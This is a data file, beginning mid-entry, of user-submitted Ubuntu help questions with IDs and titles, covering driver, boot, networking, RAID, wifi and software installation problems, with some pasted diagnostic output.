pid=1262 : logging to .xsession-errors [ +4.53s ] debug : activating vt 7 is this file being regenerated each time i log into the desktop ? or data is being appended to the file ?
396972	how do i generate a list of packages added since installation	a number of useful pages show how to generate a list of all installed packages , eg how do i generate a package download list ? is there a way to restrict the generated list to those i have added since system installation ? that is , excluding all the packages that were installed from the iso ? and excluding any updates to those packages ? diffing the list generated from the link above with the iso manifest does n't quite work because some of the packages in the manifest ( eg drivers ) are dependent on the hardware and the user selections at install time ( eg language ) . what i 'm looking for is a list of what i have added to the base system .
396973	ubuntu cgroup architecture : cgroup-lite vs cgroup-bin and default config for lxc , libvirt-bin ?	it seems that ( at least in ubuntu 12.04 precise ) , the cgroup-lite package is used to provide some cgroup capabilities for packages like libvirt-bin and lxc . it sets up a number of cgroups in /sys/fs/cgroup for example . i was reading the very nice documentation on cgroups for redhat and i wanted to use some of the other cgroup commands that are only in cgroup-bin . but when i installed that , /sys/fs/cgroup became empty , presumably because the cgroup-lite package was uninstalled since it conflicts with cgroup-bin . what am i missing after having done this ? is there a way to get the same default set of cgroups that cgroup-lite sets up ? is there any documentation for the cgroup definition that cgroup-lite provides ? the lxc documentation in the server guide talks a bit about cgroup-lite , but seems to assume that cgroup-lite will be installed , which wo n't be true if either recommended packages are skipped , or the alt ] ernative , cgroup-bin , is installed .
396975	installing without internet	i have come with a question . i installed ubuntu 12.04 on my dell studio 1537 in hopes to rid myself of vista , if only for a few things . however , i do not have internet because i ca n't get the drivers , so i downloaded the drvier soure through vista and transfered it to my downloads folder in ubuntu . i then got this problem : ubuntu wants to use the internet to download and install the files from the net that i already have on the computer , even though i clicked the file in the folder to open in the install ( center/centre ? ) . what 's going on here ... how do i get it to install ?
396978	trouble with installing pystromo for my razer nostromo	i 'm new to ubuntu 13.10 and have been using guides to install my programs . i tried to use this guide http : //ubuntuforums.org/showthread.php ? t=948833 & page=3 to configure my razer nostromo . up to the point where i enter sudo ./pystromo-remap.py -m default.map everything seems to work . but after running this command and entering my password , the terminal just hangs in limbo . before i tried downloading pystromo i went through the tutorial to download jnostromo but that would n't run . the help would be appreciated .
396979	unable to boot from usb drive	i am trying to boot ubuntu 13.10 from a usb drive . i was expecting a regulation procedure : bios > boot-order-tweak > boot-from-usb . but it did n't work . i recently upgraded from a 7 year old laptop , and am not familiar with either uefi or secureboot or how these change anything . from first impressions of what research i could do , the combination of said unfamiliar standards help avoid malware from doing there thing , help windows to boot super fast and are compatible with newer versions of popular linux distributions . so ideally one should be able to boot into described linux distro from usb w/o disabling secureboot or enabling legacy anything . the problem seems quite trivial , as it is not being discussed at all . what am i doing wrong ? this also worries me a bit , because i was thinking of moving windows recovery to an external drive and freeing up the valuable space from my tiny ssd ( and hopefully installing another os there ) , and if i ca n't boot from usb ... ! ! about linux , can anyone also let me know if installing software not provided by hp voids my warranty ?
396982	dual monitors - only one turns off when the system is idle	i 'm currently running ubuntu 13.10 on my dell xps 8700 . i 've got two monitors hooked up to the computer : one via dvi and the other via displayport . the two-monitor setup works perfectly for the most part , but i 've got one annoying problem : when the systems is inactive , only one of the monitors turns off . under all settings -- > brightness & lock i have it set to turn the screen of when inactive for 5 minutes . the one that turns off is the one connected with dvi . any ideas ? thanks .
396983	google talk not working	i 'm running on ubuntu 13.10 , and using google chrome 64 bit . because google talk would n't work , i uninstalled the talk plugin to see if that changed anything , but no cigar . here 's an image that 'll give you a better idea than i would . on chromium it worked perfectly , but not on chrome itself .
396985	libreoffice 4.1 stable upgrade ubuntu 12.04	i 'm using ubuntu 12.04 lts , and i 'm a little confused with all the info on how to update , upgrade to libreoffice 4.1 . i want to `` replace '' my preinstalled libreoffice 3 with libreoffice 4.1 but i want it to be stable and i do n't want to update to unstable newer versions ( but maybe to stable newer ones if possible automatically ) . is it correct to do it like this step by step : ( https : //launchpad.net/~libreoffice/+archive/libreoffice-4-1 ) in terminal : sudo add-apt-repository ppa : libreoffice/libreoffice-4-1 sudo apt-get update the update is not only an update for libreoffice 4.1 but for all available ubuntu programs ? and it also just gets updates and will not get newer unstable lo versions correct ?
396986	amd 750k and ati hd 6570 and 4 gb ram	will there be some problems runing un my pc ? im worrying about my gpu
396990	how do i configure cups for a continuous feed printer ?	i have an hp designjet 430 plotter than i need to configure . everything works except that i can not define the media size as being on a roll . i need my media definition to be 36 '' wide and infinitely long . cups refuses to recognize anything beyond 36 '' wide x 1800 '' long . thanks in advance for any help or suggestions . -nate
396993	server not accessible from some subnets	i am having a problem with ubuntu server 12.04.3 lts that is it is not accessible from one specific subnet . it is not pingable nor the services are accessible . scenario is as follows : ubuntu ip address is 10.1.2.3/24 , vlan 2 . testing machine ip address is 10.2.2.1/24 , vlan 3 . testing machine is a windows box which can ping other machines in ubuntu 's vlan . ubuntu machine is able to ping testing machine 's ip address and also telnet into the services it is providing , but the reverse is not possible . if i switch the ip 's from testing machine to ubuntu machine , then , from ubuntu i can reach testing machine 's services . this is driving me crazy . any ideas ? best regards !
396995	how to install ubuntu 13.10 alongside ubuntu 12.10	how do i install ubuntu 13.10 alongside ubuntu 12.10 . thank you . steven50
396998	installing cs6 products in ubuntu	how would i install adobe cs6 products in ubuntu painlessly . in other words , how would i use playonlinux to install adobe products . the ones i use are photoshop , illustrator , indesign , ae , and premiere pro . i tried to use wine to install ae earlier but it failed to locate a file .
396999	how do i try the gtk wayland backend in ubuntu 13.10	is there any way to run any gtk application inside the weston compositor in ubuntu 13.10 ?
397000	unable to get nvidia drivers to work on geforce gt755m ( optimus )	i am trying to get ubuntu 13.10 running on a lenovo y510p with a geforce gt755m graphics card . i have followed countless tutorials on the web , all to no avail . the methods i have tried include : 1 ) installing latest nvidia drivers from their website ( 3.31 ) 2 ) installing latest nvidia drivers from ppas ( 3.31 , 3.19-updates ) 3 ) installing nvidia-current ( 3.04 ) 4 ) setting up bumblebee with nvidia drivers ( 3.31 , 3.19-updates , 3.04 ) and various combinations of these . the drivers do n't work when i install them ( they are not being used ) , and when i enable them with jockey-text , unity does n't load at all : it displays a black screen after login ( 3.31 ) or lightdm restarts after entering the user password ( 3.19-updates ) . i have tried installing linux mint as well , and cinnamon does not load with the nvidia drivers ( it reports a crash and enters fallback mode ) . the system works without the drivers , running on the integrated intel card , but i would prefer to get the nvidia card set up properly . additionally , when the system starts to boot , the screen brightness always gets set to 0 and i need to manually turn it up . i would appreciate any help or ideas .
397002	mouse cursor flickering with ubuntu 13.10	i read about this problem and the solution is `` system settings > displays . in the displays window , you will see an unknown monitor . click it and disable it . '' but there is no `` unknown monitor '' for me ! so what can i do ?
397003	unable to download subtitles from smplayer	today i noticed i ca n't download subtitles using smplayer , it worked couple days ago , when i try to download subtitle i get this error : download failed : moved permanently is there a fix for this ?
397005	assigning new ip address	my girlfriend has the ip address to my computer and is getting onto my computer and stealing stuff . i use linux and was wondering if i could assign a new ip address other than thru my internet provider , which i will do if there is no other way . i looked up online and found the following article : http : //www.wikihow.com/assign-an-ip-address-on-a-linux-computer is it possible to assign a new real ip address , not just masking my real ip address which would n't be of any use . cheers !
397007	create bootable windows 8.1 iso using ubuntu	i 'm wondering if anyone can give me some guidance as to how to create a bootable windows 8.1 installation iso using ubuntu/linux . the deal is that i had to extract the files from an existing iso so i could make some mods to the configuration . now i need to wrap the iso up again and boot into it using virtualbox . for reasons i 'd rather not go into , i ca n't create a bootable usb or cd , and i ca n't do this using windows . is there a pure linux solution to my problem ?
397013	ca n't access server remotely	i 've been running an ubuntu server for the past month to run my website . it 's all be working fine , i had a few directory 's for the different sites i was running and domains were pointed to them just fine . i then tried to start using clean urls ( seo friendly urls ) so i made it that .htaccess could be used . the issue was is that it did n't seem to be working so i thought i 'd restart apache again and it still did n't seem to be working so i changed some of the config file and that made some errors and then i fixed them by restoring default but since then i ca n't access the server at all remotely . this is from the browser to get onto the sites , on filezilla and also on putty . i checked i could still ping the server and i could and i re-booted it but still i ca n't access it .
397014	launcher transparency	after messing around with compizconfig i got to a state where i had to re-install lightdm , ubuntu-desktop and then re-enable all the compiz plugins . everything works great , but the launcher transparency does n't do anything . the launcher will change color depending on the wallpaper , but it stays at full opacity . i also tried unity-tweak-tool , and that did n't do anything either . any suggestions ?
397015	how do i fixit it so that only one bootloader works ( windows or ubuntu ) ?	when my pc starts up i first get the grub bootloader showing windows ( default ) and then windows . when i select windows i then get the windows bootloader screen . how do i fix it so that one or the other loads but not both ? i 'm running ubuntu 13.10 and windows 7 pro . thank you .
397016	tor inhibits url bar from working	i got tor to work on my ubuntu , working in that it connects and is running . however , when i try to type something into the url bar or search engine , the keystrokes do n't register . if i have firefox open as well , it does n't allow firefox to work either . i 've tried it with only the tor browser open , but i still have the same problem .
397030	download google web fonts , how to install it ?	i used terminal to download google web fonts using commands listed below apt-get install -y mercurial ; hg clone https : //googlefontdirectory.googlecode.com/hg/googlefontdirectory ; i now have a directory in my home folder called `` google font directory `` . it has sub folder named `` ofl `` which all font in separate folder . it seems there are 680 items . so dragging and dropping them to .fonts folder is almost impossible . is there any method to install them automatically ? i have `` type catcher `` ( just for your info ) . please help me with this . thanks . ps : i use ubuntu 12.04 lts .
397034	touchpad disabled and cursor invisible with touchscreen laptop on 13.10	i have an asus s400c running ubuntu 13.10 . after shutting down overnight and restarting this morning , i noticed there was no visible mouse cursor and trackpad events were not firing - no left or right click , no two-finger scrolling . the touchscreen is still working fine , however the pointer sprite is n't displayed . if i log out , the touchpad mouse works fine and is visible on the log in screen . if i move the cursor around with the touchpad while it is logging in , it freezes at a point between the log in screen and my account opening , while the screen is still black . using the touchscreen after that point causes the cursor to become invisible again . sudo modprobe -r psmouse & & sudo modprobe psmouse has no effect . gsettings set org.gnome.settings-daemon.plugins.cursor active false renders the cursor visible , but the touchpad is still disabled . the cursor remains visible for touchscreen events . gsettings set org.gnome.settings-daemon.plugins.cursor active true returns the situation to as originally described . in short : help ! edit 1 : output of synclient -l : parameter settings : leftedge = 129 rightedge = 3120 topedge = 120 bottomedge = 2103 fingerlow = 1 fingerhigh = 1 maxtaptime = 180 maxtapmove = 173 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 78 horizscrolldelta = 78 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.050813 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 19 verthysteresis = 19 clickpad = 1 rightbuttonarealeft = 1624 rightbuttonarearight = 0 rightbuttonareatop = 1822 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0
397037	unpublish files recursively problem in ubuntu one	i 'm trying to unpublish files recursively in ubuntu one . when i execute the following command in terminal : find . -type f -exec u1sdtool -- unpublish-file= { } `` ; '' only 1 published file will be unpublished instead of all of them . i also have to use ctrl+c to stop running because it wo n't do so automatically . publishing ( change `` unpublish '' by `` publish '' in command ) works fine . is this a bug or am i doing something wrong ? my ubuntu one version is 4.2.0 and i 'm using ubuntu 13.04 .
397040	hardware raid 1 problems	so yesterday , i had ubuntu 12.04 on a 1tb standalone drive , and a hardware raid 1 array of two 1.5tb drives . the raid is setup in the bios , and has functioned as expected on windows and on ubuntu 13.04 . today , i installed xubuntu 13.10 on the standalone drive . so no changes made to the raid 1 array . booted into xubuntu , and now the raid disks show up as two separate disks , ( sda and sdb , ) and can both me mounted and modified . however , changes do not `` sync '' between the two disks . so , with no changes made on the hardware raid side , why did ubuntu recognize my raid array as 1 unit , and function properly with it , but xubuntu does not ? will i have to implement a software solution in order to resolve this ? and if so , is there any way to implement that software solution without having to wipe the drives and start fresh ? i do n't exactly have 1.5tb of free space hanging around to back everything up to and start over . thanks . results of fdisk -l below , and the top two drives are the two that are supposed to be in hardware raid 1 : disk /dev/sda : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0b2dac61 device boot start end blocks id system /dev/sda1 2048 2929684479 1464841216 7 hpfs/ntfs/exfat disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0b2dac61 device boot start end blocks id system /dev/sdb1 2048 2929684479 1464841216 7 hpfs/ntfs/exfat disk /dev/sdc : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x72ad4fdb device boot start end blocks id system /dev/sdc1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sdc2 206848 1250129919 624961536 7 hpfs/ntfs/exfat disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000f205c device boot start end blocks id system /dev/sdd1 1945524224 1953523711 3999744 82 linux swap / solaris /dev/sdd2 * 2048 976564547 488281250 83 linux /dev/sdd3 976566272 1945524223 484478976 83 linux partition table entries are not in disk order
397042	broadcom bcm4311 wirless problems with ubuntu 12.04 lts	i recently installed ubuntu 12.04 lts on my dell d430 to replace an old version of ubuntu . now the wireless is not working . i have looked at a lot of the posts on the web and tried the suggestions to no avail . can anyone give me a start ? i tried using synaptic and by using the help on the following links http : //askubuntu.com/questions/55868 ... rivers-bcm43xx and also looking at the blacklist . any help would be appreciated !
397047	suppressing suggest application in lens	when i use the lens to run the calculator ( which if often ) , i ca n't type just 'calc [ enter ] ' ( which is what my muscle memory does ) , i have to type 'calcu [ enter ] ' otherwise libreoffice calc starts . how can i suppress libreoffice calc from showing in the list . or better still , how can i ensure the calculator program has precedence ?
397048	vuze : 0 users -- but was working fine before clean install !	vuze gives an error that `` 0 users '' are connected , and a firewall error . i do n't think it 's the network , because the same network was working fine just a few hours ago . vuze was working perfectly up to earlier today . i had been running 12.04 lts , but did a clean install and put on 13.10 desktop . now , vuze just does n't connect . the specific diagnostic error : testing port 24488 ... nat error - connect attempt to 96.55.205.166:24488 ( your computer ) timed out after 20 seconds . this means your port is probably closed . although , just a litte while ago that worked fine , even after the clean install , but was still giving `` 0 users '' -- so i do n't put much into that diagnostic . while it 's a wireless connection to a router , it was working fine earlier today . i highly , highly , doubt the router is the problem . i do not have physical access to the router . thufir @ dur : ~ $ thufir @ dur : ~ $ java -version java version `` 1.7.0_25 '' openjdk runtime environment ( icedtea 2.3.12 ) ( 7u25-2.3.12-4ubuntu3 ) openjdk client vm ( build 23.7-b01 , mixed mode , sharing ) thufir @ dur : ~ $ thufir @ dur : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:13:20 : ac:13 : b0 inet addr:192.168.0.19 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :213:20ff : feac:13b0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:66688 errors:0 dropped:0 overruns:0 frame:0 tx packets:41338 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33718783 ( 33.7 mb ) tx bytes:3971188 ( 3.9 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1271 errors:0 dropped:0 overruns:0 frame:0 tx packets:1271 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:122835 ( 122.8 kb ) tx bytes:122835 ( 122.8 kb ) thufir @ dur : ~ $ switching the port to 24489 gives : testing port 24489 ... ok ! but still `` 0 users '' , so that 's no progress at all . what does `` 0 users '' really mean , and how do i get connected again ? proceeding on the assumption that the network is n't the problem ( it was working earlier today fine ) , that the break is correlated exactly with the clean install , and that i do n't have physical access to the router . what diagnostics can i run on vuze itself ? here is the startup from console : thufir @ dur : ~ $ thufir @ dur : ~ $ vuze [ warning ] /usr/bin/vuze : no java runtime was found [ warning ] /usr/bin/vuze : no java_cmd set for run_java , falling back to java_cmd = java file : /usr/lib/jni/ ; file : /usr/lib/java/ ; file : /usr/share/java/azureus2.jar ; file : /usr/share/java/log4j-1.2-1.2.17.jar ; file : /usr/share/java/commons-cli-1.2.jar ; file : /usr/lib/java/swt-gtk-3.8.2.jar ; file : /home/thufir/ changelocale : *default language* ! = english ( canada ) . searching without country.. changelocale : searching for language english in *any* country.. changelocale : no message properties for locale 'english ( canada ) ' ( en_ca ) , using 'english ( default ) ' uifunctions/imageload took 35ms new shell took 352ms new shell setup took 78ms
397059	wifi disconnect in hp envy 15-j012la	my problem is that my wifi disconnect sometimes after 5 min , 30 min or 3 hrs if i have lucky . i installed ubuntu 12.04 64bit in my notebook . info : merickk @ merickk-hp-envy-15-notebook-pc : ~ $ lspci | grep network 05:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) 05:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 05:00.1 bluetooth : ralink corp. rt3290 bluetooth 06:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) i tried this how do i get a ralink rt3290 wireless card working ? but dose n't work how can i fix this ?
397060	corrupted blackberry sd card - partition table	thanks so much for the super interesting articles and discussions here . i 've found myself with a 32gb micro sd card corrupted by my bb 9780 . screenshot with some details is attached below . i have tried testdisk normal , deep , boot sector analysis ( backup is bad too ) and rebuild ( on a backup ) , but it wo n't find but a few files from the hundreds that were on there . next up i 'd try to set the partition type to fat32 and then to chksdk/dosfsck . any thoughts on this or how to best proceed ?
397061	anything i should know about hardware compatibility with ubuntu ?	are there any components that out right do n't work with ubuntu ? i 'm looking at building my own computer and just want to make sure everything will work . i.e . my motherboard wo n't work . or intel haswell cpus are n't going to run . thanks in advance .
397062	cross compiling error for helloworld program	i have already created the amhello-1.0.tar.gz using this tutorial click to open now am trying to make cross compiling but error occurs . i am following this tutorial click to open after entering make command error occurs hp @ ubuntu : ~/amhello-1.0 $ make make all-recursive make [ 1 ] : entering directory `/home/hp/amhello-1.0' making all in src make [ 2 ] : entering directory `/home/hp/amhello-1.0/src' i586-mingw32msvc-gcc -g -o2 -o hello.exe main.o main.o : file not recognized : file format not recognized collect2 : ld returned 1 exit status make [ 2 ] : *** [ hello.exe ] error 1 make [ 2 ] : leaving directory `/home/hp/amhello-1.0/src' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/hp/amhello-1.0' make : *** [ all ] error 2
397066	how do i use all available hardware resource in my intel® core™ i7-3517u ?	my sony vaio has a processor model : intel® core™ i7-3517u it appears to me as being 4 cores but it does not show the threads . what is wrong ? how could i fix it ? how can i access that information ? i just want to check that my 4 x 2 virtual threads are really there working at the fullest ! ; ) spec . os type : ubuntu 13.10 64-bit processor : intel® core™ i7-3517u cpu @ 1.90ghz × 4 ( cores ) obs . : the computer came with windows 8 , but i do not like windows , then i swap to ubuntu ! but it was working with 8 threads before , i checked myself , but in ubuntu i ca n't find this information . any help i will appreciate ! cheers ! follow my file /proc/cpuinfo information processor : 0 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i7-3517u cpu @ 1.90ghz stepping : 9 microcode : 0x12 cpu mhz : 800.000 cache size : 4096 kb physical id : 0 siblings : 4 core id : 0 **cpu cores : 2** apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf eagerfpu pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 4788.76 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : i added only information about processor 0 , there are 3 more processors but not so different from this one .
397070	universal usb installer , reboot then black screen with a white `` _ ''	i use universal usb installer 1.9.5.1 and use ubuntu 11.10/12.04/13.10 to make a usb os , but when i finished the making process as i reboot my computer i got a black screen with a white cursor on the left top of the screen . why i got this error ?
397072	how to erase my hard drive completely	i am wondering how to erase my hard drive completely , grub and all , because my hard drive is messed up . this is what i would like to do when it 's wiped clean : install windows 7 home premium 64-bit from system image . ( first and primary ) install ubuntu 12.04 64-bit . ( desktop ) ( going to be ubuntu tv ) install 4mlinux 64-bit ( for maintenance ) i would like to use the windows boot manager to be able to load any of the four oss . ubuntu grub is fine though , but it 's not really what i wanted . i also need a partition for each os . i have 250gb . how would i do this correctly ? i tried and messed up badly before . update : i have got ubuntu installed !
397076	`history` command failed to store the previously entered command	any command ( which maybe right or wrong ) entered in the terminal are stored in the ~/.bash_history file and later these commands are displayed using history command . but history command failed to store previously entered sudo ! ! and ^bad^good commands.instead of storing sudo ! ! , ^bad^good commands , it stores it 's functions . for example , sudo apt-gat update ^gat^get after that , the output of history command as , sudo apt-gat update sudo apt-get update history what was the reason for this ?
397077	system-settings option is missing	i no longer get the system-settings option on my ubuntu 12.04 . i have earlier used it several times without any problem . i am not aware which action could have caused this problem but i do n't remember uninstalling or deleting any package recently .
397084	pgadmin3 update issue	i recently installed lappstack , and used the ubuntu software center to install pgadmin3 . i am getting the error warning : the server you are connecting to is not a valid version that is supported by by this release of pgadmin iii . pgadmin iii may not function as expected . supported server versions are 8.2 to 9.1 can someone please explain how am i supposed to update my pgadmin ? i tried the update app , and it downloaded some gui update . how am i supposed to update it to the latest version ? i am new to linux , and i 'd appreciate simple solutions . thanks .
397085	what is the difference among various options of source package download ?	i want to download source package of eglibc . i get three options eglibc_2.17-97.dsc , eglibc_2.17.orig.tar.xz , eglibc_2.17-97.debian.tar.xz . please explain me the differences among these options and when to select which option ?
397089	ubuntu 12.04.3 lts x64 only shows 2gb memory	ubuntu only shows 2gb of my 6gb memory , bios and lshw reports it as having 6gb . but free -m and top only sees 2gb . appreciate your help . lshw output *-memory description : system memory physical id : 28 slot : system board or motherboard size : 6gib *-bank:0 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : cm3x2g1333c9 vendor : corsair physical id : 0 serial : 00000000 slot : channel a size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : cm3x2g1333c9 vendor : corsair physical id : 1 serial : 00000000 slot : channel a size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:2 description : dimm ddr3 synchronous 1600 mhz ( 0.6 ns ) product : 9905474-051.a00lf vendor : kingston physical id : 2 serial : 382ce993 slot : channel b size : 2gib width : 64 bits clock : 1600mhz ( 0.6ns ) *-bank:3 description : dimm synchronous [ empty ] product : array1_partnumber3 vendor : a1_manufacturer3 physical id : 3 serial : a1_sernum3 slot : channel b width : 64 bits
397090	system randomly crashes	i do n't know really how to explain this in more detail ... besides ... my system just sometimes crashes randomly.. it usually does it when i 'm on youtube though . but it does n't freeze or anything , it just turns off completely . i am running 13.10 and it is a fresh install .
397091	ubuntu 12.04 , 13.10 - how to install vodafone mobile connect usb modem for 3g , 4g ? model , option globesurfer icon	i have this device vodafone option globsurfer icon usb modem . which is working in windows 7 , xp , vista . ( driver for windows : http : //www.myceloteh.com/3g/softwaredriver-update-vista-for-vodafone-easybox/ with compatibility modes set to windows vista let it work in windows 7 ) but i am 100 % ubuntu fan and user , when i connect the device i can see usb lsusb is detected but how can i use it ? under windows 7 by default did not worked unless i did following : ( i am expecting similar setup how to do in ubuntu ? ) edit : saying no device $ lsusb | grep qualcom bus 003 device 004 : id 05c6:1000 qualcomm , inc. mass storage device $ dmesg g=0 syscall=2 compat=0 ip=0x7f85be2c86c0 code=0x50000 [ 41871.644031 ] usb 3-4 : > new full-speed usb device number 4 using xhci_hcd [ 41871.661637 ] usb 3-4 : > new usb device found , idvendor=05c6 , idproduct=1000 [ 41871.661643 ] usb 3-4 : > new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 41871.661647 ] usb 3-4 : > product : usb mmc storage [ 41871.661650 ] usb 3-4 : > manufacturer : qualcomm , incorporated [ 41871.661653 ] usb 3-4 : > serialnumber : 000000000002 [ 41871.698520 ] initializing usb mass storage driver ... [ 41871.701459 ] usb 3-4 : > usb disconnect , device number 4 [ 41894.970334 ] audit_printk_skb : 9 callbacks suppressed
397093	how do i get my acer c720 to boot into 12.04 cinnamon on startup ?	i have successfully installed 12.04 and it works great . i just want to startup into 12.04 . i have tried this command : sudo cgpt add -i 6 -p 5 -s 1 /dev/sda but it is not working . i still boot into chrome . how can i solve this ?
397094	lts or normal release for 2014	there was a time not long ago when this question would ( and should ! ) of been marked as a duplicate of this question or many others ... but the landscape of ubuntu has changed since 12.04 , and it will again with 14.04 . my question is this : who should run the lts now ? is it just business and servers , or is it now casual users , home users and students as well ? on the other hand , since the regular releases are not as major as they used to be , would they be safe for students and casual users ? could a someone depend on their laptop day in and day out on a regular release ? what are the pros and cons of each now ? specifically i ask because i 'm an engineering and physics student . i do a lot of programming , cad ( vmwared solidworks ) , and writing ( latex ) . i want to know whats best for me since i ca n't have my computer unstable .
397095	usb drives are not mounted automatically	my usb drive is not mounted automatically but it has detected through lsusb . i also used dconf-editor but it is not working . every time i have to mount manually through disk utility . and i can not change wallpaper.it sets in the default wallpaper . i have windows os also installed in my pc.i used to switch between os occasionally . once i switched from windows to ubuntu i found above problems and my partitions were found unmounted.i managed to mount the partitions through ntfs configuration.but above said problems were not solved . mainly i want a solution for automount usbdrive .
397096	unrecognized esata	i 'm on ubuntu 13.10 64-bit . i have a nas at home that uses esata , since 11.10 my esata is not recognized anymore . i think i read all the post concerning the esata mount in ubuntu but with no luck . fdsisk -l doesnt show me the device . neither is : sudo rescan-scsi-bus when i connect the esata device i get this in dmesg [ 37338.784750 ] ata8 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 37338.791065 ] ata8.00 : ata-8 : samsung hd204ui , 1aq10001 , max udma/133 [ 37338.791071 ] ata8.00 : 3907029168 sectors , multi 0 : lba48 ncq ( depth 31/32 ) , aa [ 37338.797442 ] ata8.00 : configured for udma/133 [ 37338.812801 ] ata8 : eh complete [ 37338.812930 ] scsi 7:0:0:0 : direct-access ata samsung hd204ui 1aq1 pq : 0 ansi : 5 [ 37338.813237 ] sd 7:0:0:0 : attached scsi generic sg8 type 0 [ 37338.813324 ] sd 7:0:0:0 : [ sdh ] 3907029168 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 37338.813569 ] sd 7:0:0:0 : [ sdh ] write protect is off [ 37338.813575 ] sd 7:0:0:0 : [ sdh ] mode sense : 00 3a 00 00 [ 37338.813768 ] sd 7:0:0:0 : [ sdh ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 37338.819515 ] sdh : sdh1 [ 37338.820525 ] sd 7:0:0:0 : [ sdh ] attached scsi disk i dont want to do a mkfs cause i need to keep the data on my nas how to fix this ?
397100	installation of ubuntu as only os on asus x402ca	i just got an asus x402ca , it has uefi and secure boot , system specs are in here : http : //www.asus.com/notebooks_ultrabooks/x402ca/ # specifications im planning to run ubuntu as my main and only os , i have always setup this partitions , as this is only a desktop : 20 gb on / 8 gb on swap - for suspend and hibernate the rest goes on /home i have read this : https : //help.ubuntu.com/community/uefi it says that i dont have worry to run ubuntu in uefi or not if im running ubuntu as the only os . what version of ubuntu do you recommend for this ? do i need to add any partition ? do i have to disable secure boot , fast startup ? anything or is just as simple as install ubuntu . i dont care about windows but i do care about having a system up and functional . thanks in advance .
397101	could not copy 'formula ' from input line in libreoffice ?	why i can not copy formula from the input line in libreoffice so that i can use that in different file ? i can select it but not copy it . thank you .
397112	installed gnome 3.10 does n't display	i had installed gnome 3.10 on my ubuntu 13.04 by terminal commnands . but as soon i restart my pc..it wont display me gnome desktop environment..it still display the traditional ubuntu . please help me how to enable gnome 3.10 .
397114	daily stock closing price in libreoffice	how can i import stock closing prices from financial websites like yahoo finance ? there is a option to 'download to spreadsheet ' on website , but it contains high , low etc.. i just want closing prices .
